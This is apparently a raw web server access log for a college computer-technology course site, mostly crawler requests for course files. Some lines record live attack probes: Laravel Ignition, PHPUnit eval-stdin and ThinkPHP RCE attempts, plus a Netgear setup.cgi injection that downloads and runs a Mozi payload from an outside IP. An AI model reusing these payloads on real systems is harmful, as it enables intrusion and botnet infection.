207.46.13.66 - - [30/Apr/2021:04:08:35 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/PC%20Core%20Components/ HTTP/1.1" 200 523 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:08:35 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/data/swf/ HTTP/1.1" 200 5775 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:08:36 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/_notes/dwsync.xml HTTP/1.1" 200 324 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [30/Apr/2021:04:08:39 -0500] "GET /JimMartinson/CST1510/Resources/Links/Welcome%20to%20Usb.brando.com.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [30/Apr/2021:04:08:49 -0500] "GET /JimMartinson/MMDT1145/InstructionalGuide.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1026/Resources/TCP%252FIP_Tutorial_and_Technical_Overview.pdf HTTP/1.1" 200 81669 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1026/Resources/subnet_sheet.html HTTP/1.1" 200 10943 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1510/Resources/Previous%20Editions/_notes/dwsync.xml HTTP/1.1" 200 1913 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1510/Resources/Previous%20Editions/ HTTP/1.1" 200 2232 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Display%20Technology%20Content/_notes/dwsync.xml HTTP/1.1" 200 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:08:51 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Laptops%20Content/_notes/ HTTP/1.1" 200 406 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:04:08:57 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/_notes/ HTTP/1.1" 200 408 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:04:08:57 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/player/VideoPlayer.html HTTP/1.1" 200 1408 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:04:08:57 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/data/playerproperties.xml HTTP/1.1" 200 12122 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:04:08:57 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/data/swf/ HTTP/1.1" 200 5321 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.112 - - [30/Apr/2021:04:08:57 -0500] "GET /JimMartinson/CST1026/Resources/masks.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [30/Apr/2021:04:09:01 -0500] "GET /JimMartinson/CST1510/Labs/Lab15/ HTTP/1.1" 200 459 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [30/Apr/2021:04:09:08 -0500] "GET /JimMartinson/CST1510/Labs/Lab19c/1%29%20LianLi.txt HTTP/1.1" 200 837 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:09:08 -0500] "GET /JimMartinson/CST1600/Schedule.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:09:18 -0500] "GET /JimMartinson/MMDT1021/Resources/CSS_Links/49%20outstanding%20examples%20of%20CSS%20Web%20design%20Creative%20Bloq.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.112 - - [30/Apr/2021:04:09:27 -0500] "GET /JimMartinson/CST1510/Resources/Previous%20Editions/6thedition1996.pdf HTTP/1.1" 200 81669 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:45 -0500] "GET /JimMartinson/CST2505/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [30/Apr/2021:04:09:46 -0500] "GET /jeffpolman/CST2840/resources/Basic%20AP%20Config.doc HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.45 - - [30/Apr/2021:04:09:48 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [30/Apr/2021:04:09:49 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6c_flash_lecture/player/ HTTP/1.1" 200 3734 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
207.46.13.66 - - [30/Apr/2021:04:09:52 -0500] "GET /JimMartinson/MMDT1021/Resources/CSS_Links/CSS%20Zen%20Garden%20The%20Beauty%20of%20CSS%20Design.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/Utilities/Images/The%20Complete%20Repair%20&%20Recovery%20Toolkit/Toolkit.ISO HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/CST1510/Resources/Technical%20Reference/Printers%20Content/_notes/ HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/CST1510/Resources/Technical%20Reference/OS%20and%20File%20System%20Content/ HTTP/1.1" 200 694 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Audio%20Hardware%20and%20Software%20Content/ HTTP/1.1" 200 707 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/OS%20and%20File%20System%20Content/ HTTP/1.1" 200 674 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:09:55 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Original%20PC%20Reference/ASCII%20Character%20Codes.pdf HTTP/1.1" 200 81671 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:10:00 -0500] "GET /JimMartinson/MMDT2146/ExampleFiles/_notes/dwsync.xml HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:10:00 -0500] "GET /JimMartinson/MMDT2146/Resources/MMDT2146_Install_20180109.zip.cloak HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:10:00 -0500] "GET /JimMartinson/CST1510/Resources/Technical%20Reference/Printers%20Content/Printers%20and%20Scanners.pdf HTTP/1.1" 200 81669 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:04:10:01 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Display%20Technology%20Content/ HTTP/1.1" 200 679 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:10:14 -0500] "GET /JimMartinson/MMDT1021/Resources/CSS_Links/The%20W3C%20CSS%20Validation%20Service.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:10:31 -0500] "GET /JimMartinson/Utilities/Docs/startup.htm HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:10:31 -0500] "GET /JimMartinson/CST1510/Resources/Technical%20Reference/Printers%20Content/Printers%20Chapter.pdf HTTP/1.1" 200 81669 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:10:31 -0500] "GET /JimMartinson/CST1510/Labs/Lab01/ HTTP/1.1" 200 470 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:04:10:32 -0500] "GET /JimMartinson/CST1510/Labs/Lab19c/2%29%20Cooler.txt HTTP/1.1" 200 668 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:04:11:07 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6c_flash_lecture/data/swf/ HTTP/1.1" 200 6922 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [30/Apr/2021:04:16:22 -0500] "GET /RockyHyberger/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
200.94.83.157 - - [30/Apr/2021:04:17:18 -0500] "POST /_ignition/execute-solution HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:19 -0500] "GET /_ignition/execute-solution HTTP/1.1" 404 169 "http://134.29.175.74:80/_ignition/execute-solution" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:19 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:19 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 36 "http://134.29.175.74:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:20 -0500] "GET /login HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:20 -0500] "GET /login HTTP/1.1" 301 185 "http://134.29.175.74:80/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:20 -0500] "GET /login/ HTTP/1.1" 200 7080 "https://cst.ridgewater.edu/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:20 -0500] "GET /jenkins/login HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:20 -0500] "GET /jenkins/login HTTP/1.1" 404 169 "http://134.29.175.74:80/jenkins/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - 8hYTSUFk [30/Apr/2021:04:17:21 -0500] "GET /manager/html HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:21 -0500] "GET /manager/html HTTP/1.1" 404 169 "http://134.29.175.74:80/manager/html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:21 -0500] "GET /wp-login.php HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:22 -0500] "GET /wp-login.php HTTP/1.1" 404 36 "http://134.29.175.74:80/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:22 -0500] "GET /?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
200.94.83.157 - - [30/Apr/2021:04:17:23 -0500] "GET /?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 200 9868 "http://134.29.175.74:80/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
192.241.220.107 - - [30/Apr/2021:04:21:13 -0500] "GET /actuator/health HTTP/1.1" 301 185 "-" "Mozilla/5.0 zgrab/0.x"
20.191.45.212 - - [30/Apr/2021:04:21:48 -0500] "GET / HTTP/1.1" 301 185 "http://cst.ridgewater.edu/" "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)"
20.191.45.212 - - [30/Apr/2021:04:21:49 -0500] "GET / HTTP/1.1" 200 9868 "https://cst.ridgewater.edu/" "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)"
20.191.45.212 - - [30/Apr/2021:04:21:49 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "https://cst.ridgewater.edu/favicon.ico" "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)"
207.46.13.66 - - [30/Apr/2021:04:21:59 -0500] "GET /JimMartinson/CST1611/Schedule/ HTTP/1.1" 200 7100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.144.38 - - [30/Apr/2021:04:26:35 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
186.33.99.225 - - [30/Apr/2021:04:28:59 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
114.119.129.92 - - [30/Apr/2021:04:30:17 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.230 - - [30/Apr/2021:04:32:23 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.230 - - [30/Apr/2021:04:32:23 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
114.119.136.139 - - [30/Apr/2021:04:32:34 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/netmgmt.html HTTP/1.1" 200 308019 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.4 - - [30/Apr/2021:04:35:00 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [30/Apr/2021:04:35:00 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [30/Apr/2021:04:35:01 -0500] "GET /JimMartinson HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [30/Apr/2021:04:35:01 -0500] "GET /JimMartinson HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.237.75.108 - - [30/Apr/2021:04:35:23 -0500] "GET / HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
114.119.146.61 - - [30/Apr/2021:04:35:49 -0500] "GET /CSTclub/index.html HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.230 - - [30/Apr/2021:04:38:42 -0500] "GET /vmware/ActivateWindows.txt HTTP/1.1" 200 103 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
131.220.6.152 - - [30/Apr/2021:04:39:46 -0500] "GET / HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"
207.46.13.98 - - [30/Apr/2021:04:46:50 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/player/attach.html HTTP/1.1" 200 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [30/Apr/2021:04:48:31 -0500] "GET /JimMartinson/CST1600/Resources/Notes/20200421.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:04:51:08 -0500] "GET /jeffpolman/CST1700/resources/JeffPolmanAdobeConnectStudentInstructions.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.175.71.164 - - [30/Apr/2021:04:51:26 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.71.164:49578/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 185 "-" "-"
66.249.72.168 - - [30/Apr/2021:04:51:48 -0500] "GET /CSTclub/docs/declaration-to-be-active-and-club-roster.docx HTTP/1.1" 200 4796230 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.100 - - [30/Apr/2021:04:59:43 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/player/zoom.html HTTP/1.1" 200 1433 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.190.113 - - [30/Apr/2021:04:59:44 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/player/flashcommand.js HTTP/1.1" 200 37204 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
207.46.13.98 - - [30/Apr/2021:04:59:47 -0500] "GET /Credentials/1999-00/_notes/dwsync.xml HTTP/1.1" 200 893 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
209.141.33.74 - - [30/Apr/2021:05:03:45 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 185 "http://134.29.175.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.33.74 - - [30/Apr/2021:05:03:45 -0500] "" 400 0 "-" "-"
49.145.229.199 - - [30/Apr/2021:05:05:48 -0500] "GET / HTTP/1.1" 301 185 "-" "Screaming Frog SEO Spider/15.1"
128.14.134.170 - - [30/Apr/2021:05:09:22 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [30/Apr/2021:05:09:23 -0500] "GET / HTTP/1.1" 200 9869 "http://134.29.175.74/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.134 - - [30/Apr/2021:05:16:48 -0500] "GET / HTTP/1.1" 200 9869 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.171.6 - - [30/Apr/2021:05:25:08 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.22 - - [30/Apr/2021:05:25:09 -0500] "GET /JimMartinson/CST1600/Resources/Install/mysql-8.0.19-macos10.15-x86_64.dmg HTTP/1.1" 200 81661 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
40.77.167.100 - - [30/Apr/2021:05:28:31 -0500] "GET /Credentials/Ridgewater%20College%2C%20Hutchinson%20Campus%20-%20Fall%20Semester%202006%20Class%20Schedule.htm HTTP/1.1" 200 28139 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:05:31:26 -0500] "GET /Credentials/index.cfm?Credential_ID=1493 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.216.163 - - [30/Apr/2021:05:33:53 -0500] "GET /hudson HTTP/1.1" 301 185 "-" "Mozilla/5.0 zgrab/0.x"
34.121.182.57 - - [30/Apr/2021:05:38:10 -0500] "GET /JeffPolman/CST2504/resources/IRQ+io%20resources.docx HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.121.182.57 - - [30/Apr/2021:05:38:10 -0500] "GET /JeffPolman/CST2504/resources/IRQ+io%20resources.docx HTTP/1.1" 404 169 "http://cst.ridgewater.edu/JeffPolman/CST2504/resources/IRQ+io%20resources.docx" "Go-http-client/1.1"
40.77.167.98 - - [30/Apr/2021:05:42:14 -0500] "GET /course/?logout HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [30/Apr/2021:05:44:55 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/player/?C=S;O=A HTTP/1.1" 200 3734 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
34.122.162.36 - - [30/Apr/2021:05:45:59 -0500] "GET /jeffpolman/MMDT1001/CST.MMDT1001Syllabus.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.122.162.36 - - [30/Apr/2021:05:45:59 -0500] "GET /jeffpolman/MMDT1001/CST.MMDT1001Syllabus.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/MMDT1001/CST.MMDT1001Syllabus.pdf" "Go-http-client/1.1"
34.73.220.108 - - [30/Apr/2021:05:46:09 -0500] "GET /jeffpolman/MMDT1001/resources/presentations/Chapter10.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.73.220.108 - - [30/Apr/2021:05:46:09 -0500] "GET /jeffpolman/MMDT1001/resources/presentations/Chapter10.pdf HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/MMDT1001/resources/presentations/Chapter10.pdf" "Go-http-client/1.1"
114.119.145.78 - - [30/Apr/2021:05:49:03 -0500] "GET /JimMartinson/CST2505?Assignments HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
77.88.5.171 - - [30/Apr/2021:05:49:24 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.171 - - [30/Apr/2021:05:49:28 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/EndofChapterSolutions/Ch12.doc HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.72.170 - - [30/Apr/2021:05:50:08 -0500] "GET /Zoom/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.170 - - [30/Apr/2021:05:50:09 -0500] "GET /Zoom/ HTTP/1.1" 200 6752 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.168 - - [30/Apr/2021:05:50:13 -0500] "GET /js/debug.js?e&datetime=20210430055009 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/Zoom/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.166 - - [30/Apr/2021:05:50:13 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210430055009 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/Zoom/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.66 - - [30/Apr/2021:05:50:38 -0500] "GET /JimMartinson/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.5 - - [30/Apr/2021:05:51:02 -0500] "GET /JimMartinson/MMDT1021/Resources/CSS_Links/_notes/ HTTP/1.1" 200 376 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
207.46.13.112 - - [30/Apr/2021:06:02:30 -0500] "GET /JimMartinson/CST1600/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:06:10:20 -0500] "GET /Credentials/index.cfm?Credential_ID=1927 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
